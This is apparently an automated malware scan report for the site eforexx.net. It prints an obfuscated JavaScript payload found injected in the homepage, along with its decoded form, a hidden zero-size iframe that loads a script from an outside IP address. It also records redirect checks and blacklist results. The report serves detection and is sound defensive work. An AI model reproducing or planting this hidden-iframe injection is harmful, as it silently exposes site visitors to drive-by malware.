Scanned pages/files
Request | Server response | Status |
http://eforexx.net/ | 200 OK Content-Length: 34416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var JqtwWze3uMc = 'JqtwWze3uMc3cJqtwWze3uMc69JqtwWze3uMc66JqtwWze3uMc72JqtwWze3uMc61JqtwWze3uMc6dJqtwWze3uMc65JqtwWze3uMc20JqtwWze3uMc73JqtwWze3uMc72JqtwWze3uMc63JqtwWze3uMc3dJqtwWze3uMc22JqtwWze3uMc68JqtwWze3uMc74JqtwWze3uMc74JqtwWze3uMc70JqtwWze3uMc3aJqtwWze3uMc2fJqtwWze3uMc2fJqtwWze3uMc31JqtwWze3uMc37JqtwWze3uMc36JqtwWze3uMc2eJqtwWze3uMc33JqtwWze3uMc31JqtwWze3uMc2eJqtwWze3uMc37JqtwWze3uMc32JqtwWze3uMc2eJqtwWze3uMc39JqtwWze3uMc36JqtwWze3uMc2fJqtwWze3uMc6aJqtwWze3uMc64JqtwWze3uMc62JqtwWze3uMc2f Decoded script: <iframe src="http://176.31.72.96/jdb/inf.php?id=47640a0be5937393c342fa34f09c6e21" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://eforexx.net/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://eforexx.net/templates/eforexx02/script.js | 200 OK Content-Length: 10774 Content-Type: application/javascript | clean |
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery-1.6.1.min.js | 200 OK Content-Length: 91342 Content-Type: application/javascript | clean |
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery.nivo.slider.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://eforexx.net/test404page.js | 404 Not Found Content-Length: 481 Content-Type: text/html | clean |
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js | 500 Can't connect to cdn.widgetserver.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eforexx.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:25:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 16:25:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a5703b588b242a389d4a6e74591d03ef=ggp4dvt2gkfv0bqrobmqu1hj76; path=/
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: eforexx.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:25:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 16:25:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a5703b588b242a389d4a6e74591d03ef=ggp4dvt2gkfv0bqrobmqu1hj76; path=/
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: eforexx.net
Referer: http://www.google.com/search?q=eforexx.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eforexx.net
Referer: http://www.google.com/search?q=eforexx.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eforexx.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eforexx.net/
Result: eforexx.net is not infected or malware details are not published yet.
Result: eforexx.net is not infected or malware details are not published yet.